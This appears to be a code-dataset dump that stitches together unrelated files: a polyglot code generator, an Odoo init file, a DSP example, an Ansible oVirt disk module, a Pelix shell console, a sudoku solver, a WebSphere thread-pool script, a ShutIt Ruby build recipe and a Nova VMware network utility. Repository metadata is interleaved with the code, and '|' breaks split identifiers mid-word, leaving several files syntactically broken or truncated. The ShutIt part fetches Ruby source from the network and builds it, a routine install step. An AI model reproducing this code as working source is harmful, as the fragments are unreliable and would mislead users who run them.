#Test everything in polyglotCodeGenerator.py
#Use re.match(expr, stringToSplit).groups() to split a string with its parameters:
#http://stackoverflow.com/questions/18903923/how-to-split-a-string-in-python-without-redundant-output
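#A minimal sketch of the splitting idea noted above (illustrative only, not part
#of the original module): a capturing group in the pattern makes re.split() keep
#the <<parameter>> tokens alongside the surrounding text, which is what
#splitParameterString() below relies on.
def _example_split_with_parameters():
    import re
    parts = re.compile(r"(<<(?:[^\s]+)>>)").split("replace <<foo>> in <<bar>>")
    #parts == ['replace ', '<<foo>>', ' in ', '<<bar>>', '']
    return parts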
from pyparsing import OneOrMore, nestedExpr
import re
def splitParameterString(theString):
toFilter = re.compile("(<<(?:[^\s]+)>>)").split(theString)
return filter(lambda a: a != '', toFilter)
def getRegexFromString(theString):
theSplitString = splitParameterString(theString)
for x in range(0, len(theSplitString)):
if theSplitString[x].startswith("<<") and theSplitString[x].endswith(">>"):
theSplitString[x] = "([^\s]+)"
return re.compile("".join(theSplitString))
def splitStatement(theRegex, stringToSplit):
return re.match(theRegex, stringToSplit).groups()
def getThingToCheckAgainstRegex(theArray):
theCounter = 0
toReturn = ""
for idx, current in enumerate(theArray):
if(idx != 0):
toReturn += " "
if (type(current) != str or (ty
|
pe(current) == str) and (("'" in current) or ('"' in current))):
theCounter +
|
= 1
toReturn += "<<" + str(theCounter) + ">>"
else:
toReturn += current
return toReturn
stringToTest = "(replace(?: each| every|)) <<foo>> (in|inside(?: of)|within) <<bar>> (with) <<baz>>"
theRegex = getRegexFromString(stringToTest)
print(splitParameterString(stringToTest))
print(splitStatement(theRegex, "replace (a) in b with c"))
print(splitStatement(theRegex, "replace a within b with c"))
print(splitStatement(theRegex, "replace a inside of b with c"))
print(splitStatement(theRegex, "replace every a in b with c"))
#I'm still working on crossLanguageParser.py, but I'm trying to see if I can get this new syntax to work.
#This is supposed to be a re-write of crossLanguageParser.py, using Polish notation.
#evaluateMacro is the main function here.
#print(getThingToCheckAgainstRegex(["the", "type", "of", ["foo", "goo"], "is", "'bar'"]))
def isParameter(theString):
    return theString.startswith("<<") and theString.endswith(">>")
arrayOfOutputs = [
[["<<type>> [ <<dimensions>> ] <<name>> = <<initialValue>>", "<<type>> <<name>> [ <<dimensions>> ] = <<initialValue>>"], "initializeVar('<<name>>', '<<type>>', <<initialValue>>, <<dimensions>>)", "final"],
[["<<type>> <<name>> = <<initialValue>>"], "(<<type>> [ None ] <<name>> = <<initialValue>>)"],
#def initializeVar(variableName, variableType, initialValue, arrayDimensions):
[["def <<isStatic>> <<returnType>> <<functionName>> <<parameterNames>> <<parameterTypes>> <<body>>"], "getFunction('<<functionName>>', '<<isStatic>>', <<parameterNames>>, <<parameterTypes>>, '<<returnType>>', <<body>>)", "final"],
[["return <<toReturn>>",], "Return(<<toReturn>>)", "final"],
[["while <<condition>> <<action>>"], "whileLoop([<<action>>], <<condition>>)", "final"],
[["switch <<condition>> <<action>>",], "switch(<<condition>>, [<<action>>])", "final"],
[["case <<condition>> <<action>>"], "case(<<condition>>, [<<action>>])", "final"],
[["else <<action>>", "else { <<action>> }"], "Else([<<action>>])", "final"],
[["if <<condition>> then <<output>>", "<<output>> unless <<condition>> is false", "if <<condition>> { <<output>> }", "<<output>> if <<condition>>", "<<output>> if and only if <<condition>>", "if <<condition>> <<output>>"], "If(<<condition>>, [<<output>>])", "final"],
[["elif <<condition>> <<action>>", "else if <<condition>> then <<action>>"], "Elif(<<condition>>, [<<action>>])", "final"],
[["<<param1>> ; <<param2>>", "<<param1>> , <<param2>>"], "<<param1>>,<<param2>>", "final"],
[["<<param1>> ;", "<<param1>> ,"], "<<param1>>,", "final"],
[["module <<body>>"], "module([<<body>>])", "final"],
[["main <<body>>"], "main([<<body>>])", "final"],
[["<<value1>> == <<value2>>", "<<value1>> is <<value2>>", "<<value1>> equals <<value2>>", "<<value1>> is equal to <<value2>>"], "equals(<<value1>>, <<value2>>, 'int')", "final"],
[["<<item>> is in <<array>>", "<<array>> contains <<item>>"], "(<<item>> in <<array>>)", "final"],
#If it ends in "final", then the output string is directly returned.
[["not <<x>>", "! <<x>>"], "Not(<<x>>)", "final"],
[["replace each <<contained>> in <<container>> with <<replacement>>", "replace every <<contained>> in <<container>> with <<replacement>>"], "replace each <<contained>> in <<container>> with <<replacement>>", "final"],
#If there are only 3 items in the array, then the output is translated into another macro
[["unless <<condition>> <<action>>", "<<action>> unless <<condition>>"], "(if (not <<condition>>) then <<action>>)"],
[["while <<condition>> <<action>>", "<<action>> while <<condition>>", "do <<action>> while <<condition>> is true", "<<action>> until <<condition>> becomes false"], "while(<<condition>>){<<action>>}", "final"],
#"eval" means the output string will be directly evaluated.
[["<<thing1>> means <<thing2>>"], "addToArray(<<thing1>>, <<thing2>>)", "eval"],
[["<<functionName>> { <<parameterList>> }"], "callFunction('<<functionName>>', None, [<<parameterList>>])", "final"],
[["<<param1>> + <<param2>>", "<<param1>> plus <<param2>>"], "add([<<param1>>, <<param2>>])", "final"],
[["<<param1>> - <<param2>>"], "subtract(<<param1>>, <<param2>>)", "final"],
[["<<param1>> * <<param2>>"], "multiply(<<param1>>, <<param2>>)", "final"],
[["<<param1>> / <<param2>>", "<<param1>> divided by <<param2>>"], "divide(<<param1>>, <<param2>>)", "final"],
[["<<param1>> % <<param2>>"], "Mod([<<param1>>, <<param2>>])", "final"],
[["<<param1>> or <<param2>>", "<<param1>> || <<param2>>"], "Or(<<param1>>, <<param2>>)", "final"],
[["<<param1>> > <<param2>>", "<<param1>> is greater than <<param2>>"], "greaterThan(<<param1>>, <<param2>>)", "final"],
[["<<param1>> < <<param2>>", "<<param1>> is less than <<param2>>>>"], "lessThan(<<param1>>, <<param2>>)", "final"],
[["<<param1>> <= <<param2>>"], "lessThanOrEqualTo(<<param1>>, <<param2>>)", "final"],
[["<<param1>> >= <<param2>>"], "greaterThanOrEqualTo(<<param1>>, <<param2>>)", "final"],
[["<<param1>> and <<param2>>", "<<param1>> && <<param2>>" "<<param1>> & <<param2>>"], "And(<<param1>>, <<param2>>)", "final"],
[["class <<className>> { <<body>> }",], "getClass(<<className>>, <<body>>)", "final"],
#def getClass(className, body):
[["<<param>> ++"], "(<<param>> += 1)"],
[["<<param>> --"], "(<<param>> -= 1)"],
[["seriesOfStatements <<param>>", "series of statements <<param>>"], "seriesOfStatements([<<param>>])", "final"],
[["<<param1>> += <<param2>>"], "(<<param1>> = (<<param1>> + <<param2>>))"],
[["<<param1>> -= <<param2>>"], "(<<param1>> = (<<param1>> - <<param2>>))"],
[["<<param1>> *= <<param2>>"], "(<<param1>> = (<<param1>> * <<param2>>))"],
[["<<param1>> ^= <<param2>>"], "(<<param1>> = (<<param1>> ^ <<param2>>))"],
[["<<param1>> = <<param2>>"], "setVar(<<param2>>, <<param1>>)", "final"],
#def setVar(valueToGet, valueToChange):
[["for <<initializer>> <<condition>> <<increment>> <<action>>", "for <<initializer>> ; <<condition>> ; <<increment>> { <<action>> }"], "forLoop(<<action>>, <<initializer>>, <<condition>>, <<increment>>)", "final"],
#def forLoop(body, initializer, condition, increment):
[["for <<variable>> from <<start>> to <<end>> <<action>>"], "(for [ (<<variable>> = <<start>>) ; (<<variable>> < <<end>>) ; (<<variable>> ++) ] { <<action>> })"],
[["<<param1>> ^ <<param2>>", "<<param1>> to the power of <<param2>>", "param1 ** param2"], "<<param1>>^<<param2>>", "final"],
[["[ <<param>> ]"], "[<<param>>]", "final"],
[["<<className>> . <<methodName>> { <<methodParameters>> }"], "<<className>>.<<methodName>>(<<methodParameters>>)", "final"]
]
def addToArray(thing1, thing2):
global arrayOfOutputs
thing2 = ("(" + thing2 + ")")
thing2 = list(OneOrMore(nestedExpr()).parseString(thing2)[0])
thing1 = thing1.split(" ")
arrayOfOutputs += [[thing1, thing2]]
for idx1, current1 in enumerate(arrayOfOutputs):
currentStringOutput = current1[1]
for idx2, current2 in enumerate(current1[0]):
current1[0][idx2] = current1[0][idx2].split(" ")
if(len(current1) ==
|
t3dev/odoo
|
addons/event/__init__.py
|
Python
|
gpl-3.0
| 189
| 0
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing detai
|
ls.
from . import controllers
from . import models
from . import wizard
from
|
. import report
|
miltonsarria/dsp-python
|
filters/ex2/ejemplo_window.py
|
Python
|
mit
| 1,773
| 0.038917
|
#digital signal processing
#Universidad Santiago de Cali
from scipy import signal
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('tools/')
from fourierFunc import fourierAn
from scipy.signal import get_window
##########################################
#BLOCK 1
#define the sampling frequency
Fs=60
tf=5 #final time
#define the time sequence up to 5 seconds
nT=np.linspace(1./Fs,tf,Fs*tf);
#define two frequency components in Hz and compute their equivalent in rad/s
F1=7
F2=6
#omega
w1=2*np.pi*F1
w2=2*np.pi*F2
#define the window
window = 'hanning'
#separate sequences
x1=2*np.sin(w1*nT)
x2=1*np.cos(w2*nT)
#generate the discrete sequence x[n]=x1[n]+x2[n]
x=2*np.sin(w1*nT)+1*np.cos(w2*nT)
N=512
n=nT.size
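#zero-pad each sequence symmetrically up to N=512 samples so the spectrum is
#evaluated on a finer frequency grid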
x=np.hstack((np.zeros(int((N-n)/2)),x,np.zeros(int((N-n)/2))))
x1=np.hstack((np.zeros(int((N-n)/2)),x1,np.zeros(int((N-n)/2))))
x2=np.hstack((np.zeros(int((N-n)/2)),x2,np.zeros(int((N-n)/2))))
#gener
|
ar ventana
M = n
w = get_window(window, M)
print(M)
w=np.hstack((np.zeros(int((N-n)/2)),w,np.zeros(int((N-n)/2))))
print(w.shape)
xw=x*w
xw1=x1*w
xw2=x2*w
#compute the Fourier transform
absX,Xdb,pX=fourierAn(x)
f=np.linspace(-Fs/2,Fs/2,Xdb.size)
absXw,Xdbw,pXw=fourierAn(xw)
absXw1,Xdbw1,pXw2=fourierAn(xw1)
absXw2,Xdbw2,pXw2=fourierAn(xw2)
#visualize the results of the analysis done with the Fourier transform
plt.subplot(411)
plt.plot(x1)
plt.ylabel('x1[n]')
plt.subplot(412)
plt.p
|
lot(x2)
plt.ylabel('x2[n]')
plt.subplot(413)
plt.plot(x)
plt.ylabel('x[n]=x1[n]+x2[n]')
plt.subplot(414)
plt.plot(xw)
plt.ylabel('x[n]*w[n]')
plt.xlabel('tiempo - s')
plt.figure(2)
plt.subplot(311)
plt.plot(f,Xdbw)
plt.subplot(312)
plt.plot(f,Xdbw1)
plt.subplot(313)
plt.plot(f,Xdbw2)
plt.show()
|
vdrhtc/Measurement-automation
|
tests/test_keysight11713C.py
|
Python
|
gpl-3.0
| 249
| 0.004016
|
import pytest
from drivers.keysight11713C import *
@pytest.mark.skip
def test_set_get():
attenuator = Keysight11713C("swc1", "Y")
for i in range(82):
attenuat
|
or.set_attenuation(i)
assert i == att
|
enuator.get_attenuation()
|
Jorge-Rodriguez/ansible
|
lib/ansible/modules/cloud/ovirt/ovirt_disk.py
|
Python
|
gpl-3.0
| 29,884
| 0.002577
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ovirt_disk
short_description: "Module to manage Virtual Machine and floating disks in oVirt/RHV"
version_added: "2.2"
author: "Ondra Machacek (@machacekondra)"
description:
- "Module to manage Virtual Machine and floating disks in oVirt/RHV."
options:
id:
description:
- "ID of the disk to manage. Either C(id) or C(name) is required."
name:
description:
- "Name of the disk to manage. Either C(id) or C(name)/C(alias) is required."
aliases: ['alias']
description:
description:
- "Description of the disk image to manage."
version_added: "2.5"
vm_name:
description:
- "Name of the Virtual Machine to manage. Either C(vm_id) or C(vm_name) is required if C(state) is I(attached) or I(detached)."
vm_id:
description:
- "ID of the Virtual Machine to manage. Either C(vm_id) or C(vm_name) is required if C(state) is I(attached) or I(detached)."
state:
description:
- "Should the Virtual Machine disk be present/absent/attached/detached."
choices: ['present', 'absent', 'attached', 'detached']
default: 'present'
download_image_path:
description:
- "Path on a file system where disk should be downloaded."
- "Note that you must have an valid oVirt/RHV engine CA in your system trust store
or you must provide it in C(ca_file) parameter."
- "Note that the disk is not downloaded when the file already exists,
               but you can forcibly download the disk when using C(force) I(true)."
version_added: "2.3"
upload_image_path:
description:
- "Path to disk image, which should be uploaded."
- "Note that currently we support only compatibility version 0.10 of the qcow disk."
- "Note that you must have an valid oVirt/RHV engine CA in your system trust store
or you must provide it in C(ca_file) parameter."
- "Note that there is no reliable way to achieve idempotency, so
if you want to upload the disk even if the disk with C(id) or C(name) exists,
               then please use C(force) I(true). If you use C(force) I(false), which
               is the default, then the disk image won't be uploaded."
version_
|
added: "2.3"
size:
description:
- "Size of the disk. Size should be specified using IEC standard units.
For example 10GiB, 1024MiB, etc."
- "Size can be only increased, not decreased."
interface:
description:
- "Driver of the storage interface."
|
- "It's required parameter when creating the new disk."
choices: ['virtio', 'ide', 'virtio_scsi']
default: 'virtio'
format:
description:
- Specify format of the disk.
- Note that this option isn't idempotent as it's not currently possible to change format of the disk via API.
choices: ['raw', 'cow']
content_type:
description:
- Specify if the disk is a data disk or ISO image
choices: ['data', 'iso']
default: 'data'
version_added: "2.8"
sparse:
required: False
type: bool
version_added: "2.5"
description:
- "I(True) if the disk should be sparse (also known as I(thin provision)).
If the parameter is omitted, cow disks will be created as sparse and raw disks as I(preallocated)"
- Note that this option isn't idempotent as it's not currently possible to change sparseness of the disk via API.
storage_domain:
description:
- "Storage domain name where disk should be created. By default storage is chosen by oVirt/RHV engine."
storage_domains:
description:
- "Storage domain names where disk should be copied."
- "C(**IMPORTANT**)"
- "There is no reliable way to achieve idempotency, so every time
you specify this parameter the disks are copied, so please handle
your playbook accordingly to not copy the disks all the time. This
               is valid only for VM and floating disks; template disks work
as expected."
version_added: "2.3"
force:
description:
- "Please take a look at C(image_path) documentation to see the correct
usage of this parameter."
version_added: "2.3"
type: bool
profile:
description:
- "Disk profile name to be attached to disk. By default profile is chosen by oVirt/RHV engine."
quota_id:
description:
- "Disk quota ID to be used for disk. By default quota is chosen by oVirt/RHV engine."
version_added: "2.5"
bootable:
description:
- "I(True) if the disk should be bootable. By default when disk is created it isn't bootable."
type: bool
shareable:
description:
- "I(True) if the disk should be shareable. By default when disk is created it isn't shareable."
type: bool
logical_unit:
description:
- "Dictionary which describes LUN to be directly attached to VM:"
- "C(address) - Address of the storage server. Used by iSCSI."
- "C(port) - Port of the storage server. Used by iSCSI."
- "C(target) - iSCSI target."
- "C(lun_id) - LUN id."
- "C(username) - CHAP Username to be used to access storage server. Used by iSCSI."
- "C(password) - CHAP Password of the user to be used to access storage server. Used by iSCSI."
- "C(storage_type) - Storage type either I(fcp) or I(iscsi)."
sparsify:
description:
- "I(True) if the disk should be sparsified."
- "Sparsification frees space in the disk image that is not used by
its filesystem. As a result, the image will occupy less space on
the storage."
- "Note that this parameter isn't idempotent, as it's not possible
to check if the disk should be or should not be sparsified."
version_added: "2.4"
type: bool
openstack_volume_type:
description:
- "Name of the openstack volume type. This is valid when working
with cinder."
version_added: "2.4"
image_provider:
description:
- "When C(state) is I(exported) disk is exported to given Glance image provider."
- "C(**IMPORTANT**)"
- "There is no reliable way to achieve idempotency, so every time
you specify this parameter the disk is exported, so please handle
your playbook accordingly to not export the disk all the time.
This option is valid only for template disks."
version_added: "2.4"
host:
description:
- "When the hypervisor name is specified the newly created disk or
an existing disk will refresh its information about the
underlying storage( Disk size, Serial, Product ID, Vendor ID ...)
The specified host will be used for gathering the storage
related information. This option is only valid for passthrough
disks. This option requires at least the logical_unit.id to be
specified"
version_added: "2.8"
wipe_after_delete:
description:
- "If the disk's Wipe After Delete is enabled, then the disk is first wiped."
type: bool
activate:
description:
- I(True) if the disk should be activated.
version_added: "2.8"
type: bool
extends_documentation_fragment:
|
tcalmant/ipopo
|
pelix/shell/console.py
|
Python
|
apache-2.0
| 20,364
| 0.000049
|
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Pelix interactive shell
Provides a console interface for the Pelix shell, based on readline when
available.
:author: Thomas Calmant
:copyright: Copyright 2020, Thomas Calmant
:license: Apache License 2.0
:version: 1.0.1
..
Copyright 2020 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard library
import argparse
import logging
import os
import shlex
import sys
import threading
# Initialization file handler
from pelix.misc.init_handler import InitFileHandler, remove_duplicates
# Shell constants
from pelix.constants import BundleActivator
from pelix.shell import SERVICE_SHELL
from pelix.shell.beans import IOHandler, ShellSession, safe_input
import pelix.framework as pelix
# Shell completion
from pelix.shell.completion.core import completion_hints
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (1, 0, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
_logger = logging.getLogger(__name__)
PROP_INIT_FILE = "pelix.shell.console.init_file"
""" Shell script to execute before starting the console """
PROP_RUN_FILE = "pelix.shell.console.script_file"
""" Script to run as shell input """
# ------------------------------------------------------------------------------
try:
# Set up readline if available
import readline
readline.parse_and_bind("tab: complete")
readline.set_completer(None)
except ImportError:
# Readline is missing, not critical
readline = None
# ------------------------------------------------------------------------------
class InteractiveShell(object):
"""
The interactive shell handler
"""
def __init__(self, context):
"""
Sets up the members
:param context: The bundle context
"""
self._context = context # type: pelix.BundleContext
self._shell_ref = None # type: pelix.ServiceReference
self._shell = None
# Single session
self.__session = ShellSession(IOHandler(sys.stdin, sys.stdout), {})
# Read line cache
self._readline_matches = []
# Rendez-vous events
self._lock = threading.RLock()
self._stop_event = threading.Event()
self._shell_event = threading.Event()
# Try to find a shell service
self.search_shell()
# Register as a service listener
self._context.add_service_listener(self, None, SERVICE_SHELL)
def __get_ps1(self):
"""
Gets the prompt string from the session of the shell service
:return: The prompt string
"""
try:
return self.__session.get("PS1")
except KeyError:
return self._shell.get_ps1()
def _readline_prompt(self):
"""
Prompt using the readline module (no pre-flush)
:return: The command line
"""
sys.stdout.flush()
return safe_input(self.__get_ps1())
def _normal_prompt(self):
"""
Flushes the prompt before requesting the input
:return: The command line
"""
sys.stdout.write(self.__get_ps1())
sys.stdout.flush()
return safe_input()
def loop_input(self, on_quit=None):
"""
Reads the standard input until the shell session is stopped
        :param on_quit: A callback method, called without arguments when the
shell session has ended
"""
# Start the init script
self._run_script(
self.__session, self._context.get_property(PROP_INIT_FILE)
)
# Run the script
script_file = self._context.get_property(PROP_RUN_FILE)
i
|
f script_file:
self._run_script(self.__session, script_file)
else:
# No script: run the main loop (blocking)
self._run_loop(self.__session)
# Nothing more to do
self._stop_event.set()
sys.stdout.write("Bye !\n")
sys.stdout.flush()
if on_quit is not None:
# Call a handler if needed
on_quit()
def _run_script(self, se
|
ssion, file_path):
"""
Runs the given script file
:param session: Current shell session
:param file_path: Path to the file to execute
        :return: True if a file has been executed
"""
if file_path:
# The 'run' command returns False in case of error
# The 'execute' method returns False if the run command fails
return self._shell.execute('run "{0}"'.format(file_path), session)
return None
def _run_loop(self, session):
"""
Runs the main input loop
:param session: Current shell session
"""
try:
first_prompt = True
# Set up the prompt
prompt = (
self._readline_prompt
if readline is not None
else self._normal_prompt
)
while not self._stop_event.is_set():
# Wait for the shell to be there
# Before Python 2.7, wait() doesn't return a result
if self._shell_event.wait(.2) or self._shell_event.is_set():
# Shell present
if first_prompt:
# Show the banner on first prompt
sys.stdout.write(self._shell.get_banner())
first_prompt = False
# Read the next line
line = prompt()
with self._lock:
if self._shell_event.is_set():
# Execute it
self._shell.execute(line, session)
elif not self._stop_event.is_set():
# Shell service lost while not stopping
sys.stdout.write("Shell service lost.")
sys.stdout.flush()
except (EOFError, KeyboardInterrupt, SystemExit):
# Input closed or keyboard interruption
pass
def readline_completer(self, text, state):
"""
A completer for the readline library
"""
if state == 0:
# New completion, reset the list of matches and the display hook
self._readline_matches = []
try:
readline.set_completion_display_matches_hook(None)
except AttributeError:
pass
# Get the full line
full_line = readline.get_line_buffer()
begin_idx = readline.get_begidx()
# Parse arguments as best as we can
try:
arguments = shlex.split(full_line)
except ValueError:
arguments = full_line.split()
# Extract the command (maybe with its namespace)
command = arguments.pop(0)
if begin_idx > 0:
# We're completing after the command (and maybe some args)
try:
# Find the command
ns, command = self._shell.get_ns_command(command)
except ValueError:
# Ambiguous command: ignore
return None
# Use the completer associated to the command, if any
try:
configuration = self._shell.get_command_co
|
secnot/uva-onlinejudge-solutions
|
989 - Su Doku/main.py
|
Python
|
mit
| 2,568
| 0.005062
|
import sys
from copy import deepcopy
from math import sqrt
def read_num():
return list(map(int, sys.stdin.readline().split()))
def read_sudoku():
try:
n = read_num()
if not n:
n = read_num()
n = n[0]
return [read_num() for _ in range(n*n)]
except Exception:
return None
def print_sudoku(s):
for l in s:
print(" ".join(map(str, l)))
class Sudoku(object):
def __init__(self, board):
        # sub-grid (box) size
self._dim = int(sqrt(len(board)))
# Remaining open spaces
self._nfree = sum(1 for l in board for i in l if not i)
        # Moves made
self._moves = []
|
self._board = deepcopy(board)
def _undo_move(self):
x, y = self._moves.pop()
self._board[x][y] = 0
self._nfree += 1
def _make_move(self, x, y, value):
self._moves.append((x, y))
self._board[x][y] = value
self._nfree -= 1
def _possible_values(self, x, y):
# Horizontal restrictions
h = self._board[x]
# Vertical restrictions
v = [self._board[i][y] for i in range(len(self._board))]
|
# Square restrictions
square_x, square_y = (x//self._dim)*self._dim, (y//self._dim)*self._dim
s = [self._board[square_x+i][square_y+j]
for i in range(self._dim)
for j in range(self._dim)]
# Return values not present in any restriction
restrictions = set(h+v+s)
return [x for x in range(1, len(self._board)+1) if x not in restrictions]
def _construct_candidates(self):
for i in range(len(self._board)):
for j in range(len(self._board)):
if not self._board[i][j]:
return [(i, j, v) for v in self._possible_values(i, j)]
return []
def is_solved(self):
return not bool(self._nfree)
def solve(self):
if self.is_solved():
return
candidates = self._construct_candidates()
for c in candidates:
self._make_move(*c)
self.solve()
if self.is_solved():
return
self._undo_move()
def print(self):
if self.is_solved():
print_sudoku(self._board)
else:
print('NO SOLUTION')
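# A minimal usage sketch (illustrative only; the 4x4 board below is an assumption,
# not part of the original program). The solver only needs a square list of lists,
# with 0 marking the empty cells.
def _example_usage():
    board = [[1, 0, 3, 0],
             [0, 4, 0, 2],
             [2, 0, 4, 0],
             [0, 3, 0, 1]]
    su = Sudoku(board)
    su.solve()
    su.print()  # prints the completed grid, or 'NO SOLUTION' if unsolvable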
if __name__ == '__main__':
sudoku = read_sudoku()
while sudoku:
su = Sudoku(sudoku)
su.solve()
su.print()
sudoku = read_sudoku()
if sudoku:
print('')
|
muthu-s/chef-repo
|
cookbooks/wsi/files/configurethreadpool.py
|
Python
|
apache-2.0
| 1,835
| 0.012534
|
import os;
import sys;
import traceback;
#####################################################################
## Update Thread Pool size
#####################################################################
def configureThreadPool(clusterName, threadPoolName, minSize, maxSize):
print "Cluster Name = " + clusterName + "\n"
clusterID = AdminConfig.getid("/ServerCluster:" + clusterName + "/")
serverList=AdminConfig.list('ClusterMember', clusterID)
servers=serverList.split("\n")
for serverID in servers:
serverName=AdminConfig.showAttribute(serverID, 'memberName')
print "ServerName = " + serverName + "\n"
server=AdminConfig.getid("/Server:" +serverName + "/")
threadPool = AdminConfig.list("ThreadPool",server)
for thread in threadPool.split("\n"):
n
|
ame = AdminConfig.showAttribute(thread, "name")
if (name == threadPoolName):
AdminConfig.modify(thre
|
ad, [['minimumSize', minSize],['maximumSize', maxSize]])
print name + " thread pool updated with minSize:" + minSize + " and maxSize:" + maxSize
AdminConfig.save()
#####################################################################
## Main
#####################################################################
if len(sys.argv) != 4:
print "This script requires clusterName, threadPoolName(WebContainer/Default/ORB.thread.pool...), minSize, maxSize"
sys.exit(1)
else:
clusterName = sys.argv[0]
threadPoolName = sys.argv[1]
minSize = sys.argv[2]
maxSize = sys.argv[3]
configureThreadPool(clusterName, threadPoolName, minSize, maxSize)
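#####################################################################
## Example invocation (illustrative; the cluster name and pool sizes are made up).
## wsadmin passes the arguments following the script to sys.argv without the
## script name, which matches the indexing used above:
##   wsadmin.sh -lang jython -f configurethreadpool.py MyCluster WebContainer 20 50
#####################################################################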
|
ianmiell/shutit-distro
|
ruby/ruby.py
|
Python
|
gpl-2.0
| 863
| 0.040556
|
"""ShutIt module. See http://shutit.tk
"""
from shut
|
it_module import ShutItModule
class ruby(ShutItModule):
def build(self, shutit):
shutit.send('mkdir -p /tmp/build/ruby')
shutit.send('cd /tmp/build/ruby')
shutit.send('wget -qO- http:/
|
/cache.ruby-lang.org/pub/ruby/2.2/ruby-2.2.0.tar.gz | tar -zxf -')
shutit.send('cd ruby*')
shutit.send('./configure --prefix=/usr')
shutit.send('make')
shutit.send('make install')
return True
#def get_config(self, shutit):
# shutit.get_config(self.module_id,'item','default')
# return True
def finalize(self, shutit):
shutit.send('rm -rf /tmp/build/ruby')
return True
#def remove(self, shutit):
# return True
#def test(self, shutit):
# return True
def module():
return ruby(
'shutit.tk.sd.ruby.ruby', 158844782.0025,
description='',
maintainer='',
depends=['shutit.tk.setup']
)
|
ntt-sic/nova
|
nova/virt/vmwareapi/network_util.py
|
Python
|
apache-2.0
| 7,362
| 0.002309
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 VMware, Inc.
# Copyright (c) 2011 Citrix Systems, Inc.
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility functions for ESX Networking.
"""
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.virt.vmwareapi import error_util
from nova.virt.vmwareapi import vim_util
from nova.virt.vmwareapi import vm_util
LOG = logging.getLogger(__name__)
def get_network_with_the_name(session, network_name="vmnet0", cluster=None):
"""
Gets reference to the network whose name is passed as the
argument.
"""
host = vm_util.get_host_ref(session, cluster)
if cluster is not None:
vm_networks_ret = session._call_method(vim_util,
"get_dynamic_property", cluster,
"ClusterComputeResource",
"network")
else:
vm_networks_ret = session._call_method(vim_util,
"get_dynamic_property", host,
"HostSystem", "network")
# Meaning there are no networks on the host. suds responds with a ""
# in the parent property field rather than a [] in the
# ManagedObjectReference property field of the parent
if not vm_networks_ret:
return None
vm_networks = vm_networks_ret.ManagedObjectReference
network_obj = {}
LOG.debug(vm_networks)
for network in vm_networks:
# Get network properties
if network._type == 'DistributedVirtualPortgroup':
props = session._call_method(vim_util,
"get_dynamic_property", network,
"DistributedVirtualPortgroup", "config")
# NOTE(asomya): This only works on ESXi if the port binding is
# set to ephemeral
if props.name == network_name:
network_obj['type'] = 'DistributedVirtualPortgroup'
network_obj['dvpg'] = props.key
dvs_props = session._call_method(vim_util,
"get
|
_dynamic_property",
props.distributedVirtualSwitch,
"VmwareDistributedVirtualSwitch", "uuid")
network_obj['dvsw'] = dvs_props
else:
props = session._call_method(vim_util,
"get_dynamic_property", network,
"Network", "summary.name")
if props
|
== network_name:
network_obj['type'] = 'Network'
network_obj['name'] = network_name
if (len(network_obj) > 0):
return network_obj
def get_vswitch_for_vlan_interface(session, vlan_interface, cluster=None):
"""
Gets the vswitch associated with the physical network adapter
with the name supplied.
"""
    # Get the list of vSwitches on the Host System
host_mor = vm_util.get_host_ref(session, cluster)
vswitches_ret = session._call_method(vim_util,
"get_dynamic_property", host_mor,
"HostSystem", "config.network.vswitch")
# Meaning there are no vSwitches on the host. Shouldn't be the case,
    # but just a defensive check
if not vswitches_ret:
return
vswitches = vswitches_ret.HostVirtualSwitch
# Get the vSwitch associated with the network adapter
for elem in vswitches:
try:
for nic_elem in elem.pnic:
if str(nic_elem).split('-')[-1].find(vlan_interface) != -1:
return elem.name
# Catching Attribute error as a vSwitch may not be associated with a
# physical NIC.
except AttributeError:
pass
def check_if_vlan_interface_exists(session, vlan_interface, cluster=None):
"""Checks if the vlan_interface exists on the esx host."""
host_mor = vm_util.get_host_ref(session, cluster)
physical_nics_ret = session._call_method(vim_util,
"get_dynamic_property", host_mor,
"HostSystem", "config.network.pnic")
# Meaning there are no physical nics on the host
if not physical_nics_ret:
return False
physical_nics = physical_nics_ret.PhysicalNic
for pnic in physical_nics:
if vlan_interface == pnic.device:
return True
return False
def get_vlanid_and_vswitch_for_portgroup(session, pg_name, cluster=None):
"""Get the vlan id and vswicth associated with the port group."""
host_mor = vm_util.get_host_ref(session, cluster)
port_grps_on_host_ret = session._call_method(vim_util,
"get_dynamic_property", host_mor,
"HostSystem", "config.network.portgroup")
if not port_grps_on_host_ret:
msg = _("ESX SOAP server returned an empty port group "
"for the host system in its response")
LOG.error(msg)
raise exception.NovaException(msg)
port_grps_on_host = port_grps_on_host_ret.HostPortGroup
for p_gp in port_grps_on_host:
if p_gp.spec.name == pg_name:
p_grp_vswitch_name = p_gp.vswitch.split("-")[-1]
return p_gp.spec.vlanId, p_grp_vswitch_name
def create_port_group(session, pg_name, vswitch_name, vlan_id=0, cluster=None):
"""
Creates a port group on the host system with the vlan tags
supplied. VLAN id 0 means no vlan id association.
"""
client_factory = session._get_vim().client.factory
